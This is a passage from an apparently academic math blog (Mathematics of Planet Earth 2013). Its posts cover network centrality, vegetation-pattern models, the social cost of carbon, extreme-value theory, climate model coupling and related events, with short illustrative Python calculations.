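    As a concrete illustration of the quantity hiding behind that button, here is a short Python sketch (using a made-up five-node network, not any dataset mentioned above) that computes eigenvector centrality by power iteration: a node is important to the extent that its neighbours are important, and the scores are the leading eigenvector of the adjacency matrix.

        import numpy as np

        # Hypothetical undirected network: node 0 is a hub, node 4 a pendant.
        A = np.array([[0, 1, 1, 1, 0],
                      [1, 0, 1, 0, 0],
                      [1, 1, 0, 0, 0],
                      [1, 0, 0, 0, 1],
                      [0, 0, 0, 1, 0]], dtype=float)

        x = np.ones(A.shape[0])      # start with equal importance everywhere
        for _ in range(200):         # let importance flow repeatedly along the edges
            x = A @ x
            x /= np.linalg.norm(x)   # renormalize so the scores stay finite

        print(np.round(x, 3))        # node 0 scores highest, node 4 lowest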

    It may be that information or data visualization will play a role in the greater adoption and understanding of these complex techniques. This is especially true as we move away from the static representation of data points and toward the visual representation of processes, such as Xueqiao Xu’s interactive visualization of network pathfinding [5]. Such visualizations make the processes and functions meaningful to audiences that may not be familiar with mathematical notation or programming languages. Scheidel, in his paper “The shape of the Roman world,” utilizes dynamic distance cartograms—made possible as a result of creating a network—to express a Roman world view with a highly connected Mediterranean coastal core and inland frontiers. While this relatively straightforward transformation of geographic space to represent network distance could have been expressed with mathematical notation, data visualization is more accessible to a broader audience.

    Networks are allied with notions of social power, diffusion, movement, and other behavior that have long been part of humanities and social science scholarship. The interconnected, emergent, and systematic nature of networks and network analysis is particularly exciting for the study of culture and society. Other computational methods do not so readily promote the creation of systems and models like networks do. But doing so will often require dealing with issues of uncertainty and missing evidence, especially in the case of historical networks, and require a better understanding of how networks grow and change over time. It will also require some degree of formal and explicit definition of connection that reflects fuzzy social and cultural concepts that, until now, have only been expressed in linear narrative.

    References:

    [1] The Spatial History Project: Holocaust Geographies, Stanford University
    [2] China Biographical Database Project (CBDP), Harvard University
    [3] ORBIS: The Stanford Geospatial Network Model of the Roman World
    [4] Walter Scheidel, The shape of the Roman world (pdf)
    [5] Xueqiao Xu, Pathfinding.js

    Elijah Meeks
    Digital Humanities Specialist
    Stanford University

    Posted in Political Systems, Social Systems | Leave a comment

    The Mystery of Vegetation Patterns

    Fig. 1. Landscape surrounding Niamey, Niger.

    From above, the ground almost looks like the fur of a big cat. Vegetation and barren land array to form tiger stripes and leopard spots in the dry landscape surrounding Niamey, Niger. These types of patterns are common to semi-arid ecosystems, so-called because there is enough water to support some vegetation but not enough to support it uniformly. Besides being visually striking phenomena, vegetation patterns may have a lot to tell us about how ecosystems are changing.

    Semi-arid ecosystems are in a difficult position. They exist in dangerous limbo between vibrant vegetated ecosystems and desolate deserts. And these ecosystems are not marginal. Semi-arid ecosystems support over a third of the world’s population. If climate change pushes an ecosystem towards increased aridity, then semi-arid ecosystems can become deserts incapable of supporting people. To a great extent, these deserts would be here to stay. A simple uptick in rainfall, for instance, could not return things to the way they used to be, since desertification is an erosive process that irreversibly mars landscapes.

    Because of the role that vegetation patterns occupy as signals of diminishing water in an ecosystem, scientists and mathematicians are interested in what these patterns say about how close an ecosystem is to transitioning to desert. It is possible that both the characteristic width and the qualitative appearance of the patterns may function as such indicators, i.e. vegetation stripes may become spaced farther apart or turn into patchy spots as the climate gets drier. This is a compelling reason indeed to carefully understand these patterns through the lens of mathematics.

    It turns out that vegetation patterns in semi-arid ecosystems are probably caused by the same mechanism that causes patterns to form in lots of other systems: feedback. In this case, the feedback occurs in how plants and water interact. Plants help each other at short scales by sharing nutrients and trapping water in the soil with their root systems. This creates a feedback loop in which moderate to high densities of plants are self-sustaining. However, water is a limiting factor that stops vegetation from becoming dense, and it prevents growth in sparsely vegetated areas. Together, these factors cause vegetation to spread outwards from areas of high density and then be held back by the limited water, so that localized structures form.

    A particularly illustrative example comes from patterns that form on hillsides.

    Fig. 2. Vegetation on hillside.

    The figure from Thierry et al. displays a cross section of a vegetation band on a shallow slope. Water comes into the system by precipitation, which turns into runoff as it travels downhill along the soil’s surface. If this runoff travels along a bare-ground region and encounters a patch of vegetation, it becomes absorbed by the vegetation and porous soil. This helps the patch grow more robustly. Since water is limited, plants on the uphill side of the band are preferentially nourished. The density of plants away from this edge tapers off until the start of another bare-ground region. As the average water in a system diminishes, it is easy to imagine the vegetated bands becoming smaller and the bare regions becoming larger; the stripes may drift apart.

    A number of mathematical models for vegetation patterns on flat terrain treat vegetation and water as components that react with one another and diffuse in space. Some of these models include the feature of qualitatively different patterns forming for different levels of precipitation. This mirrors what ecologists observe in semi-arid regions with different amounts of mean rainfall.

    Fig. 3. Different patterns forming for different levels of precipitation.
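    To give a concrete sense of this class of models, here is a minimal one-dimensional Python sketch of a Klausmeier-type water-vegetation reaction-diffusion system on flat ground. The parameter values are placeholders chosen only to illustrate the structure (they are not taken from the post or from any particular study); which patterns, if any, emerge depends on those values, especially the rainfall term a.

        import numpy as np

        # Non-dimensional Klausmeier-type kinetics on flat ground:
        #   dw/dt = a - w - w*n**2 + d_w * w_xx      (water)
        #   dn/dt = w*n**2 - m*n   + d_n * n_xx      (vegetation)
        n_pts, dx, dt, steps = 200, 1.0, 0.002, 100_000
        a, m = 1.0, 0.45               # rainfall and plant loss (placeholder values)
        d_w, d_n = 100.0, 1.0          # water diffuses much faster than plants spread

        rng = np.random.default_rng(0)
        n = 1.6 * (1 + 0.05 * rng.standard_normal(n_pts))   # near the vegetated state
        w = 0.28 * np.ones(n_pts)

        def lap(u):
            """Discrete Laplacian with periodic boundaries."""
            return (np.roll(u, 1) - 2 * u + np.roll(u, -1)) / dx**2

        for _ in range(steps):
            uptake = w * n**2
            w = w + dt * (a - w - uptake + d_w * lap(w))
            n = n + dt * (uptake - m * n + d_n * lap(n))

        # A large max-min contrast in n indicates that a spatially patterned
        # (striped) state has replaced uniform cover; for these placeholder
        # values a periodic profile typically develops from the initial noise.
        print("vegetation contrast:", float(n.max() - n.min()))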

    Vegetation patterns are a mysterious phenomenon that we can think about in the same way as patterns that form in many other contexts. What’s more, they may have importance that transcends their beauty. If they can be used to predict whether an ecosystem is approaching collapse, they could be immensely important to the conservation of land. The mathematical study of these patterns is crucial to our understanding of the dynamics of semi-arid ecosystems, and could have an impact on how humanity responds to the danger of climate change.

    Karna Gowda

    Posted in Biosphere, Mathematics, Patterns | 4 Comments

    DIMACS/CCICADA Collaboration on REU and Other Sustainability Projects


    Posted in Astrophysics, Atmosphere, Biodiversity, Biogeochemistry, Biology, Biosphere, Carbon Cycle, Climate, Climate Change, Climate Modeling, Climate System, Complex Systems, Computational Science, Conference, Conference Announcement, Conference Report, Cryosphere, Data, Data Assimilation, Data Visualization, Dimension Reduction, Disease Modeling, Dynamical Systems, Ecology, Economics, Energy, Epidemiology, Evolution, Extreme Events, Finance, General, Geophysics, Imaging, Inverse Problems, Machine Learning, Mathematics, Meteorology, Natural Disasters, Networks, Ocean, Optimization, Paleoclimate, Patterns, Political Systems, Probability, Public Event, Public Health, Renewable Energy, Resource Management, Risk Analysis, Social Systems, Statistics, Sustainability, Sustainable Development, Tipping Phenomena, Transportation, Uncertainty Quantification, Weather, Workshop Announcement, Workshop Report | Leave a comment

    The Social Cost of Carbon

    Recently, the United States Environmental Protection Agency (EPA) increased its estimate for the net societal cost of an additional ton of carbon dioxide (CO2) that is released into the atmosphere to \$36 from \$22. One of the immediate effects was a change of energy standards for household appliances, for example microwave ovens. Other consequences are expected to follow, for example possibly in emission standards for automobiles and power plants, and in other regulations.

    What exactly is the definition of the “social cost of carbon” (SCC)? Who is interested in determining this quantity? Who is interested in its value? Can this even be done and, if so, how accurately? And how is it done? Is there any mathematics in it?

    The social cost of carbon is generally defined as the net economic damage (overall cost minus overall benefits, accumulated over time, and discounted) of a small additional amount of CO2 (a metric ton, 1,000 kg, produced by burning about 440 liters of gasoline) that has been released into the atmosphere. Mathematically, it’s a rate of change; economically, it’s a marginal cost. Economists have been trying to determine this in order to estimate the cost of mitigation of climate change: In an ideal situation, the cost of mitigating the effects of an additional ton of CO2 in current dollars should be equal to the SCC, and if a tax were assessed on releasing CO2, it should equal the SCC.

    Concretely, suppose a new regulation is proposed with the goal of reducing greenhouse gas emissions. Implementing the regulation will cost money. If the expected cost exceeds the SCC, it is unlikely to be enacted, at least in the US and in the EU: regulators have to include a cost-benefit analysis, and the new regulation will come up short. The SCC therefore furnishes an immediate connection between climate science and climate policy. It is one way to “monetize” the results of anthropogenic climate change. And since a higher SCC makes regulations easier to justify, it will generate resistance from groups that are opposed to regulation.

    It is very difficult to obtain a reasonable number for the SCC. Clearly, climate science models that connect the release of greenhouse gases to climate changes must be used (and that’s where mathematics comes in, but it’s not the only place). But there are many additional input variables that influence it. Climate system variables include the overall climate sensitivity to CO2 emissions, the extent to which a climate model can predict abrupt climate changes, and the level of geographic detail in the model. Higher climate sensitivity, the inclusion of abrupt changes, and more details all tend to increase the SCC. There are also economic variables and model details that influence SCC, such as the discount rate (used to turn future costs into present day costs), the economic value placed on the quality of human life and ecosystems, the capacity of a society to adapt to changes in climate conditions, and the extent to which indirect costs of climate change are incorporated. A lower discount rate (meaning a long-term view into the future), high economic valuation of ecosystems, and detailed inclusion of indirect costs will all increase the SCC. In addition, the SCC is generally expected to increase in the future as economies become more stressed due to results of previous climate change. A ton of CO2 that is released in 2030 will be more expensive. Current models used by the United States EPA try to assess costs up to the year 2300 – which may be longer than the time horizon of many climate models that are currently being used.
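    A toy calculation makes the point about the discount rate. The damage stream in the Python snippet below is entirely hypothetical (a flat two dollars of marginal damage per year for 300 years, roughly the “to 2300” horizon mentioned above); real SCC estimates come from integrated assessment models, not from anything this simple.

        damage_per_year = 2.0    # hypothetical marginal damage of one extra tonne, $/year
        horizon = 300            # years over which the damages accrue

        for r in (0.025, 0.03, 0.05):
            pv = sum(damage_per_year / (1 + r) ** t for t in range(1, horizon + 1))
            print(f"discount rate {r:.1%}: present value ~ ${pv:,.0f}")
        # roughly $80, $67 and $40 for these toy inputs

    Even in this toy setting, the same physical damages are worth about twice as much today at a 2.5% discount rate as at 5%, which is one reason published SCC figures span such a wide range.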

    It is perhaps no surprise that all SCC calculations end up with a range of numbers, rather than with a fixed value, and that these ranges vary widely. In fact, there are low estimates of an SCC of -\$2 (that is, a small net benefit of increased CO2 emissions) and high estimates of \$200 or more. Generally, research in this important area lags behind the state-of-the-art of physical climate models, mainly due to the additional economic components that have to be included.

    I mentioned that the mathematical connection comes from climate models which are used to make predictions. But there is a broader, more general connection. Using models that include physical, social, and economic factors, all with their own uncertainties, presents new challenges to the emerging mathematical field of uncertainty quantification. Perhaps over time mathematics can contribute to improving the methods by which the SCC is computed.

    Posted in Climate Modeling, Economics, Social Systems | Leave a comment

    MPE2013 Public Lecture — Jane Wang, Fields Institute, June 21, 2013

    Jane Wang Lecture, June 21, 2013

    Posted in Public Event | Leave a comment

    Königsberg’s bridges, Holland’s dikes, and Wall Street’s downfall

    Public Lectures at the Centre de recherches mathématiques (CRM) in Montréal have a tendency to fill up quickly, even on a Friday night. All the more so on May 10, 2013, when the lecture was coupled with a round-the-clock science fair. As the large crowd gathered to hear Paul Embrechts, Professor of Mathematics at the Swiss Federal Institute of Technology in Zürich (ETHZ), everyone was wondering how he would connect the components of the title of his talk: “Königsberg’s bridges, Holland’s dikes, and Wall Street’s downfall.”

    Professor Embrechts is an authority in extreme-value theory and quantitative risk management. He has written many influential books and over 150 articles on these and related topics. He has also consulted widely on risk management issues with financial institutions, insurance companies, and international regulatory agencies. The “Grande Conférence” he gave at the CRM illustrated in lay terms how mathematics can be used to help design protection against catastrophic events such as epidemics, floods, tsunamis, and financial crises by observing the natural variation of risk factors, carefully assessing the chances that they reach extreme levels, and studying how risk spreads like a contagious disease in a social or banking network.

    The talk opened with the famous Königsberg bridge-crossing problem: Is it possible to find a walk through the city that would cross each of its seven bridges once and only once? Euler’s negative solution to this problem was both simple and applicable to any system of bridges, regardless of its complexity. It also pioneered graph theory as a problem-solving tool. In his lecture, Professor Embrechts showed how it is possible to use graphs to visualize the web of complex interdependencies between financial institutions and to assess systemic risk, i.e., the risk of collapse of an entire system through a domino effect caused by the failure of a single entity or cluster of entities. Using an August 2012 Nature article by ETHZ Senior Researcher Dr Stefano Battiston and his collaborators, Professor Embrechts showed how statistical and graph-theoretic tools can be used to describe the growth of systemic risk during the sub-prime mortgage crisis, to the point where a single default was more likely than ever to trigger a cascading failure.
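    Euler’s argument is easy to recast in modern terms: a connected multigraph has a walk that uses every edge exactly once if and only if at most two of its vertices have odd degree. The short Python check below (a standalone illustration, not something from the lecture) applies this to Königsberg’s four land masses and seven bridges.

        from collections import Counter

        # Edges of the Königsberg multigraph: A, B = river banks; C, D = islands.
        bridges = [("A", "C"), ("A", "C"), ("A", "D"),
                   ("B", "C"), ("B", "C"), ("B", "D"), ("C", "D")]

        degree = Counter()
        for u, v in bridges:
            degree[u] += 1
            degree[v] += 1

        odd = [node for node, d in degree.items() if d % 2]
        print("odd-degree land masses:", odd)              # all four are odd
        print("walk crossing each bridge once exists:", len(odd) in (0, 2))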

    Conceptually, protecting financial institutions from insolvency is not unlike defending the North Sea lowlands against floods and storm surges. Bank regulators in many countries around the globe are now requiring financial institutions to set aside adequate capital reserves to guard against potentially large monetary losses. These financial reserves play essentially the same role as a system of dikes on a coastline. After the catastrophic flood of 1953, the Dutch government commissioned the construction of major protective works. Taking into account cost and feasibility constraints, the Delta Works Commission fixed an acceptable flooding risk for each endangered region. In South Holland, for example, dikes were planned to fail no more than once in 10,000 years on average. But how is it possible to assess such a risk in the absence of records dating back long enough to observe the actual magnitude of a 10,000-year flood? Professor Embrechts explained that extreme-value theory plays a crucial role in allowing us to extrapolate beyond the level of observable data. An interesting twist to the story is that the initial impetus and much of the seminal work in this field is due to mathematicians and statisticians who grew up close to the North Sea — Guus Balkema, Jan Beirlant, Laurens de Haan, John Einmahl, and Jef Teugels are but a few of the Belgian and Dutch extreme-value specialists mentioned by Professor Embrechts. He himself was born soon after the 1953 flood in the vicinity of the impacted area.
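    To give a flavour of the extrapolation, here is a minimal Python sketch that fits a Gumbel distribution to a century of simulated annual maximum surge levels and reads off 100-, 1,000- and 10,000-year return levels. The data are synthetic and the method-of-moments fit is cruder than what practitioners use; the point is only that a fitted extreme-value distribution lets one estimate levels far beyond anything in the record.

        import numpy as np

        rng = np.random.default_rng(1953)
        annual_max = 250 + 40 * rng.gumbel(size=100)   # 100 years of synthetic surges (cm)

        # Method-of-moments Gumbel fit: mean = mu + 0.5772*beta, var = (pi*beta)**2 / 6.
        beta = annual_max.std() * np.sqrt(6) / np.pi
        mu = annual_max.mean() - 0.5772 * beta

        for T in (100, 1_000, 10_000):                 # return period in years
            level = mu - beta * np.log(-np.log(1 - 1 / T))
            print(f"{T:>6}-year return level ~ {level:.0f} cm")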

    In finance, the bestselling books of Nassim Nicholas Taleb have popularized the expression “black swans” for hard-to-predict rare events of large impact. No wonder extreme-value theory also plays a role in predicting, assessing and guarding against such events in the financial sector.

    It never rains but it pours. Just as extreme floods often strike several areas, stock prices tend to rise or drop together, and it can very well happen that several obligors default simultaneously. Failure to properly account for such interdependencies may lead to serious underestimation of risks and can even trigger major financial crises. In 2009, the popular press began to attribute the downfall of Wall Street to a single mathematical formula that was used by “quants” to model the probability of joint credit defaults. In Professor Embrechts’ own words, “this is akin to blaming Einstein’s $E = mc^2$ formula for the destruction wreaked by the atomic bomb.” That academics should be held responsible for the crisis is all the more ironic, given that many of them frequently spoke of the limitations of mathematical tools used in the financial sector. As early as 1998, Professor Embrechts and his collaborators had warned that the formula that allegedly “killed Wall Street” is inadequate because it fails to account for the joint occurrence of extreme events.

    As the crowd gathered for a glass of wine after this inspiring lecture, many people in the audience no doubt pondered over Professor Embrechts’ final message. Written in large letters on his last slide was a single word: “Communiquez!” Good science and good practice go hand in hand, he insisted; they require constructive dialogue. Mathematical models and statistical methods are increasingly powerful but also increasingly complex. If these tools are to be used successfully and safely, warnings from academia should not be dismissed as irrelevant babble from ivory-tower daydreamers. All the same, the world can no longer afford the blissful scientist pleasantly portrayed by American musical satirist Tom Lehrer when he sings:

    “Once the rockets are up,
    who cares where they come down?
    That’s not my department,”
    says Wernher von Braun.

    Christian Genest and Johanna G. Nešlehová
    McGill University, Montréal, Canada

    Posted in Mathematics, Risk Analysis, Statistics | Leave a comment

    Blog on Math Blogs

    Today’s post is a short one about a “Blog on Math Blogs.”

    It is just what it says: a blog about math blogs, hosted on the AMS site. The April 22 entry by Evelyn Lamb featured our very own MPE2013 blog, which was fitting, as that day was Earth Day.

    I especially like the May 28 post by Lamb, “On Pregnancy and Probability.” It features the posts of Kate Owens, who has started writing about being a “pregnant mathematician” and about weighing the reliability and cost of the medical tests she is asked to have. One particular test for gestational diabetes has really shocking statistics: only 27 percent of women who have the condition test positive for it, while 11 percent of those who do not have it also test positive.
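    A quick application of Bayes’ theorem shows why those numbers are so troubling. The sensitivity and false-positive rate in the snippet below are the figures quoted above; the 5 percent prevalence is an assumption made purely for illustration.

        sensitivity = 0.27       # P(positive test | has gestational diabetes), from the post
        false_positive = 0.11    # P(positive test | does not have it), from the post
        prevalence = 0.05        # assumed prevalence, for illustration only

        p_positive = sensitivity * prevalence + false_positive * (1 - prevalence)
        ppv = sensitivity * prevalence / p_positive
        print(f"P(condition | positive test) = {ppv:.1%}")   # about 11% under these assumptions

    Under these assumed numbers, a positive result still leaves the condition unlikely, while the low sensitivity means that most true cases are missed altogether.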

    There is a related post (submitted by Paul Alper) in the latest Chance News 93, called “The gold (acre) standard, fool’s gold,” that discusses the book “Bad Pharma: How Drug Companies Mislead Doctors and Harm Patients” by Ben Goldacre. It is an account of the bad and manipulated statistics used in randomized drug trials. One particularly disturbing section is on a patented system developed by drug manufacturers that concerns placebos; the whole point of the invention is to defeat the effectiveness of placebos. You can read the whole account here.

    Estelle Basor
    AIM

    Posted in General, Mathematics, Statistics | Leave a comment

    The Realities and the Potential of LED Lighting

    When I was at the hardware store the other day buying a replacement for a burnt out light bulb I saw the array of LED bulb options. It seems like people have been saying for a decade or more that the world of LED lighting is right around the corner and that the change brought about by the LED revolution will be the most significant lighting event since Thomas Edison. That’s a pretty tall claim, given that the light bulb is synonymous with innovation and its introduction heralded a new era.

    Nonetheless, it got me thinking about the realities and the potential of LED lighting. Roughly 20% of the North American energy budget goes towards lighting. That’s a large fraction, and most of that energy is wasted, lighting empty rooms and hallways and producing heat where we only want illumination. It’s an inefficiency calling for some kind of optimization.

    LED technological innovation has followed Haitz’s law (the LED equivalent of Moore’s law), where illumination has risen by 20X and costs decreased by 10X each decade. LEDs are finally ready for the big stage, and the lighting industry estimates that LEDs will represent 80% of the illumination market within the next seven years. If you consider that the average U.S. home has 52 light sockets (more than four billion nationwide) and that there are nearly a trillion light sockets for all uses worldwide, you’re talking about a major change in the way we light our world.

    The changes go beyond replacing one bulb type with another. Having an illumination source that turns on and off instantly with no warm up makes it efficient to integrate lights and sensor networks so that we only illuminate what we want. Mitacs, through our Accelerate internship program, is supporting research in this area through the development of low power wireless sensor networks integrated with lighting and heat control. Trials in this project have found that lighting costs can be reduced by up to 90%.

    LEDs stimulate plant growth

    Photo provided by Prof. Mark Lefsrud, McGill

    It’s not just households who will benefit from LED lighting. The ability to design LEDs with particular wavelengths makes them a great fit for agriculture, where the spectral composition of light is a major determinant of plant yield. Photosynthesis requires blue and red light, wavelengths where the best current technology, high pressure sodium lamps, is weak. Mitacs supported researchers at McGill University who are developing new LEDs that maximize plant growth while minimizing energy costs. From this research we learn more about how to optimize the light spectrum through the various plant development stages to grow crops using far less energy.

    Dr. Arvind Gupta,
    CEO & Scientific Director
    Mitacs

    Posted in Energy, Mathematics | Leave a comment

    2013 SIAM Conference on Mathematical and Computational Issues in the Geosciences

    The 2013 SIAM Conference on Mathematical and Computational Issues in the Geosciences will be held in Padua, Italy, June 17-20. The meeting is organized by the SIAM Activity Group on Geoscience and provides an interactive environment where modelers concerned with problems of the geosciences can share their issues with algorithm developers, applied mathematicians, numerical analysts, and other scientists. Topics of interest include flow in porous media, multiphase flows, phase separation, wave propagation, combustion, channel flows, global and regional climate modeling, reactive flows, atmospheric circulation, and geomechanics.

    The SIAM Conference on Mathematical and Computational Issues in the Geosciences is a biennial event which takes place alternately in the U.S. and Europe. This is the first time the event is being held in Italy. Padua (or Padova, as the Italians call it) is a medieval town located about 20 km west of Venice. The Conference will be held at the Centro Congressi Padova “A. Luciani.” Co-Chairs of the Organizing Committee are Michel Kern (INRIA and Maison de la Simulation, France) and Mario Putti (Department of Mathematics, University of Padova, Italy).

    The program features six invited lectures, two special Award Lectures, 90 minisymposia and 18 contributed paper sessions.

    Invited lectures:

    • Todd Arbogast, University of Texas at Austin (USA), “Approximation of Transport Processes Using Eulerian-Lagrangian Techniques”

    • Peter Bastian, Heidelberg University (Germany), “Efficient Numerical Computation of Multi-Phase Flow in Porous Media”

    • Hans Peter Bunge, Munich University (Germany), “Data Assimilation in Global Mantle Flow Models: Theory, Modelling and Uncertainties to Reconstruct Earth Structure Back in Time”
    • Marino Gatto, Politecnico di Milano (Italy), “The Spatiotemporal Dynamics of Waterborne Diseases”

    • Julie Pietrzak, Technical University of Delft (The Netherlands), “An Unstructured Grid Model Suitable for Flooding Studies with Applications to Mega-tsunamis”

    • Tomislava Vukicevic, National Oceanic and Atmospheric Administration (USA), “Data Assimilation and Inverse Modeling in Earth System Sciences”


    Award Lectures:

    • Career Award: Clint Dawson, University of Texas at Austin (USA), “Some Successes and Challenges in Coastal Ocean Modeling”

    • Junior Scientist Award: Marc A. Hesse, University of Texas at Austin (USA), “Interpreting Geological Observations Through the Analysis of Non-linear Waves”


    The full program can be found here.

    Posted in Conference Announcement, Geophysics | Leave a comment

    Schedule Change

    Starting June 10, the MPE2013 Daily Blog will appear Monday through Friday.

    Posted in General | Leave a comment

    Supermodeling Climate

    Considering the mathematics of Planet Earth, one tends to think first of direct applications of mathematics to areas like climate modeling. But MPE is a diverse subject, with respect to both applications and the mathematics itself. This was driven home to me at the recent SIAM Conference on Dynamical Systems in Snowbird, Utah, when I attended a session on “Supermodeling Climate.”

    The application is simple enough to describe. There are about twenty global climate models, each differing slightly from the others in their handling of the subgrid physics. Typical codes discussed in the session have grid points spaced about 100 kilometers apart in the horizontal directions and about 40 vertical layers in the atmosphere. While the codes reach some general consensus on overall trends, they can differ in the specific values produced. The question is whether the models or codes could be combined in a way that would produce a more accurate result.

    Perhaps one approach for thinking about this is to consider something familiar to anyone who watches summer weather forecasts in the U.S. – hurricane predictions. Weather forecasters often show a half-dozen different projected tracks for a hurricane – each based on a different model or computer code. Simply averaging the spatial locations at each time step would make little sense.

    While climate models or computer codes are completely different from weather models used to predict hurricanes, the problems are similar. It isn’t sufficient to average the results of the computer runs. But perhaps an intelligent way could be found to combine the computer codes so that they would produce a more accurate result with a smaller band of uncertainty.

    In the field of dynamical systems, it is known that chaotic systems can synchronize. The session that I attended considered whether researchers could couple models by taking a “synchronization view” of data assimilation. This involves dynamically adjusting coupling coefficients between models.

    While the goal is to attempt this for climate models, work to date has focused on lower-order models (like the Lorenz system). If successful, this could lead to a new way of combining various models to obtain more accurate and reliable predictions. It’s one of many examples of mathematics finding useful applications in areas not originally envisioned.
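    The flavour of the idea can be captured in a few lines of Python. Two imperfect Lorenz-63 “models” with slightly different parameters are nudged toward each other by a fixed coupling term; in the supermodeling work described in the session, the coupling coefficients are themselves adjusted dynamically from data, a step omitted from this sketch.

        import numpy as np

        def lorenz(state, sigma, rho, beta=8.0 / 3.0):
            x, y, z = state
            return np.array([sigma * (y - x), x * (rho - z) - y, x * y - beta * z])

        dt, steps, coupling = 0.001, 50_000, 5.0
        a = np.array([1.0, 1.0, 20.0])     # "model" A: sigma=10, rho=28
        b = np.array([-5.0, -5.0, 25.0])   # "model" B: sigma=11, rho=29 (imperfect twin)

        for _ in range(steps):
            da = lorenz(a, 10.0, 28.0) + coupling * (b - a)   # nudge A toward B
            db = lorenz(b, 11.0, 29.0) + coupling * (a - b)   # nudge B toward A
            a, b = a + dt * da, b + dt * db

        # With the coupling switched on, the two chaotic runs stay close together;
        # with coupling = 0 they wander off to completely different states.
        print("final disagreement:", float(np.linalg.norm(a - b)))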

    More generally, “interactive ensembles” of different global climate models, using inter-model data assimilation, can produce more accurate results. An active area of research is how to best do this.

    Jim Crowley
    Executive Director
    Society for Industrial and Applied Mathematics (SIAM)

    Posted in Climate Modeling | Leave a comment

    Opinion Article in Today’s Washington Post

    The following opinion article is taken from today’s Washington Post. It is a rebuttal to an earlier op-ed article and is of interest to the scientific community because it has links to several relevant articles in the scientific literature.

    Climate Science Tells Us the Alarm Bells Are Ringing

    By Michael Oppenheimer and Kevin Trenberth, Published: June 7

    In a recent op-ed for The Post, Rep. Lamar Smith (R-Tex.) offered up a reheated stew of isolated factoids and sweeping generalizations about climate science to defend the destructive status quo. We agree with the chairman of the House Committee on Science, Space and Technology that policy should be based on sound science. But Smith presented political talking points, and none of his implied conclusions is accurate.

    The two of us have spent, in total, more than seven decades studying Earth’s climate, and we have joined hundreds of top climate scientists to summarize the state of knowledge for the Intergovernmental Panel on Climate Change (IPCC), the World Climate Research Program and other science-based bodies. We believe that our views are representative of the 97 percent of climate scientists who agree that global warming is caused by humans. Legions of studies support the view that, left unabated, this warming will produce dangerous effects. (This commentary, like so much of our work, was a collaborative process, with input from leading climate scientists Julia Cole, Robert W. Corell, Jennifer Francis, Michael E. Mann, Jonathan Overpeck, Alan Robock, Richard C.J. Somerville and Ben Santer.)

    Man-made heat-trapping gases are warming our planet and leading to increases in extreme weather events. Droughts are becoming longer and deeper in many areas. The risk of wildfires is increasing. The year 2012, the hottest on record for the United States, illustrated this risk with severe, widespread drought accompanied by extensive wildfires.

    Last month, levels of carbon dioxide in the atmosphere exceeded 400 parts per million, approaching the halfway mark between preindustrial amounts and a doubling of those levels. This doubling is expected to cause a warming this century of four to seven degrees Fahrenheit. The last time atmospheric carbon dioxide reached this level was more than 3 million years ago, when Arctic lands were covered with forests. The unprecedented rate of increase has been driven entirely by human-produced emissions.

    Projections from an array of scientific analyses summarized by the National Academy of Sciences and most of the world’s major scientific organizations indicate that by the end of this century, people will be experiencing higher temperatures than any known during human civilization — temperatures that our societies, crops and ecosystems are not adapted to.

    Computer model projections from at least 27 groups at universities and other research institutes in nine countries have proved solid. In many cases, they have been too conservative, underestimating over the past 20 years the amounts of recent sea-level rise and Arctic sea ice melt.

    Much has been made of a short-term reduction in the rate of atmospheric warming. But “global” warming requires looking at the entire planet. While the increase in atmospheric temperature has slowed, ocean warming rose dramatically after 2000. Excess heat is being trapped in Earth’s climate system, and observations of the Global Climate Observing System and others are increasingly able to locate it. Simplistic interpretations of cherry-picked data hide the realities.

    In recent years, our understanding of the relationship between climate and extreme weather has sharpened, along with our appreciation of the vast damages such events cause.

    Contrary to Smith’s assertions, there is conclusive evidence that climate change worsened the damage caused by Superstorm Sandy. Sea levels in New York City harbors have risen by more than a foot since the beginning of the 20th century. Had the storm surge not been riding on higher seas, there would have been less flooding and less damage. Warmer air also allows storms such as Sandy to hold more moisture and dump more rainfall, exacerbating flooding.

    Smith referred to the IPCC’s special report on extremes but did not mention that the report connects several types of extreme weather to climate change, including heat waves, extreme precipitation and, in some regions, drought. Furthermore, the last major IPCC report, in 2007, stated unequivocally that Earth is warming.

    While we are addressing science here, one broad policy implication is clear: Humans must reduce their greenhouse gas emissions. Since John Tyndall discovered in 1859 that carbon dioxide and other greenhouse gases cause warming, science has made great strides toward establishing the scope of that warming and its impact.

    The combined impetus of observed trends in climate and weather extremes, and continuing discoveries in climate science, lay bare how ludicrous Smith’s suggestion is that since we know nothing, we should do nothing.

    We know a lot, more than enough to recognize that the alarm bells are ringing.

    Increases in heat waves and record high temperatures; record lows in Arctic sea ice; more severe rainstorms, droughts and wildfires; and coastal communities threatened by rising seas all offer a preview of the new normal in a warmer world. Smith’s policy plan amounts to “wait and see.” But the longer we wait — effectively, like him, closing our eyes to science — the more difficult and expensive the solutions become, and the more irreversible the damage will be.

    Michael Oppenheimer is a professor of geosciences and international affairs at Princeton University. Kevin Trenberth is a distinguished senior scientist at the National Center for Atmospheric Research.

    Posted in Climate, General | Leave a comment

    The Sphere of the Earth at the National Museum of Natural History and Science of Lisbon

    The National Museum of Natural History and Science of the University of Lisbon, Portugal, has added several new and significant displays to the exhibition Forms and Formulas in the framework of the Portuguese activities for MPE2013. The highlight is the winning entry of the MPE2013 competition, The Sphere of the Earth, an interactive module created by Daniel Ramos (Spain). The module uses Tissot indicatrices to show the deformations of the Earth’s surface that occur in six map projections, illustrating the impossibility of a “perfect map” of the Earth.

    This new exhibit enlarges the component “Images and Visualizations” of Forms and Formulas, which recreated part of IMAGINARY as an open and interactive mathematical exhibition. The enlargement contains two new modules which were also shown at the UNESCO exhibition in Paris last March: the interactive application Rhumb Lines and Spirals, about planar projections of loxodromes and great circles (the shortest paths between two points on a spherical surface), whose difference was identified by Pedro Nunes in 1537; and the film Sundials, Mathematics and Astronomy, which focuses on aspects such as measuring distances to celestial bodies and the difference between solar time and legal time.

    The exhibition is open until the end of September. As the title indicates, it shows the connection between geometrical forms and algebraic formulas via interactive models, day-to-day objects and architectural forms. The relationship between mathematics and other areas related to MPE2013 is enhanced by a series of monthly conferences and informal dialogs with invited speakers from different scientific disciplines. The next talk is scheduled for June 6, when the architect João do Carmo Fialho will focus on geometric forms with soap and water.

    João Torgal
    MUNHAC, Univ. Lisboa

    Posted in Mathematics, Public Event | Leave a comment

    Random Networks and the Spread of HIV

    Martina Morris, a Professor of Sociology and Statistics at the University of Washington, studies the transmission of sexually transmitted diseases like HIV using network analysis, including random graph models. A really interesting story called “Breaking the Chain,” about some of the history of her involvement in the study of these networks, was published in Reed magazine. In the story she relates a defining moment that took place in Uganda in 1993.

    From the story in Reed:

